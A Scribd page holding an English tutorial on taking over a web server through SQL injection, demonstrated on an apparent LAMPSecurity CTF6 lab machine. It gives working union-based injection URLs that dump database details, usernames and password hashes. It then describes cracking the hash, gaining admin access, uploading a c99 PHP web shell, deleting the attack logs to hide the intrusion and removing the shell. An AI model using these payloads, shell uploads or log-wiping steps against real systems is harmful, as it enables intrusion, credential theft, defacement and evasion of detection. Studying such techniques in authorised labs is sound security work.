Scribd Logo
Hochladen

Willkommen bei Scribd!

  • Advanced SQL Injection Tutorial

    Hochgeladen von

    Anonymous jM34IzxsXw
    41 Ansichten42 Seiten
    Advanced SQL Injection Tutorial

    Copyright

    © © All Rights Reserved

    Verfügbare Formate

    DOCX, PDF, TXT oder online auf Scribd lesen

    Stufen Sie dieses Dokument als nützlich ein?

    Sind diese Inhalte unangemessen?

    Dieses Dokument melden
    Advanced SQL Injection Tutorial

    Copyright:

    © All Rights Reserved
    Als DOCX, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    41 Ansichten42 Seiten

    Advanced SQL Injection Tutorial

    Hochgeladen von

    Anonymous jM34IzxsXw
    Advanced SQL Injection Tutorial

    Copyright:

    © All Rights Reserved
    Als DOCX, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    von 42

    Advanced SQL Injection Tutorial - Complete website rooting

    Hi All,

    In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.

    What all you need

    1. Mantra Security Toolkit - Download

    2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

    3. Any PHP Shell you are comfortable with


    - Google for "c99 shell"

    Now the process

    Step 1:

    I'm on the home page of the website now

    Code:
    http://192.168.132.128/
    Step 2:

    I went through all the pages of web site and found a page with URL input

    Code:
    http://192.168.132.128/?id=13
    Step 3:

    I launched Hackbar by pressing F9


    Step 4:

    The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL
    and pressing Execute.

    Code:
    http://192.168.132.128/?id=13'
    Since the page content is different from the previous one. I can make sure that the web page is vulnerable.

    Step 5:

    Lets find out the number of tables

    Code:
    http://192.168.132.128/?id=13 order by 1
    Step 6:

    I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a
    tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply
    press on + button till I see any changes on the webpage

    Code:
    http://192.168.132.128/?id=13 order by 7
    Step 7:

    I went up to 7 and no change till now

    Code:
    http://192.168.132.128/?id=13 order by 7
    Step 8:

    I'm on 8 now and I can see the page changed

    Code:
    http://192.168.132.128/?id=13 order by 8
    Step 9:

    Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
    Step 10:

    I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not
    exists and there are only 7 tables
    Step 11:

    Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2

    Code:
    http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7
    Step 12:

    I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page

    Code:
    http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7
    The current user is cms_user@localhost

    Step 13:

    Lets find out the version of the database. I replaced 2 in the URL with version() command

    Code:
    http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7
    5.0.45 is the version

    Step 14:

    Let me list all the tables

    Code:
    http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from
    information_schema.tables
    From this list I found "user" is an interesting table

    Step 15:

    Now I listed all the columns and its a big list

    Code:
    http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from
    information_schema.columns
    Step 16:

    I want columns from the table "user" and nothing else

    Code:
    http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from
    information_schema.columns where table_name='user'
    Step 17:

    Lets find the user name

    Code:
    http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user
    Step 18:

    Now, what about password

    Code:
    http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user
    Its encrypted

    Step 19:

    Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu
    > send to > md5.rednoize.com
    Step 20:

    Voila.!!! I got the password


    Step 21:

    Finding the log in page. Its was right in front of me


    Step 22:

    Logging in with the credentials I have


    Step 23:

    Greetings.!!!
    Step 24:

    I'm an admin now. Look at my powers.


    Step 25:

    Let me add an event


    Step 26:

    and of course I want to upload a picture


    Step 27:

    Lets see it allows me to upload the shell or not


    Step 28:

    Now I'm pressing on "Add Event" button


    Step 29:

    Nice. Looks like it's got uploaded


    Step 30:

    Let's see where the shell got uploaded to


    Step 31:

    I'm trying to get the default upload location


    Step 32:

    Looks like I got it

    Let me click on the c9shell.php file I just uploaded

    Step 33:

    Voila. I have shell access


    Step 34:

    I simply clicked on the up button to get the root folder


    Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of
    current tutorial

    Step 35:

    What I'm interested is the log folder


    Step 36:

    I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
    Step 37:

    Let me go back and edit the log file


    Step 38:
    I deleted complete log entries. Now saving it.

    Step 39:

    Nice. Log file is empty now


    Step 40:

    Now. Lets remove the c99 shell by pressing on Self Remove

    Step 41:

    Confirmed.!!!
    Step 42:

    OK. Good Bye C99

    Step 43:

    Well. It got deleted itself

    Das könnte Ihnen auch gefallen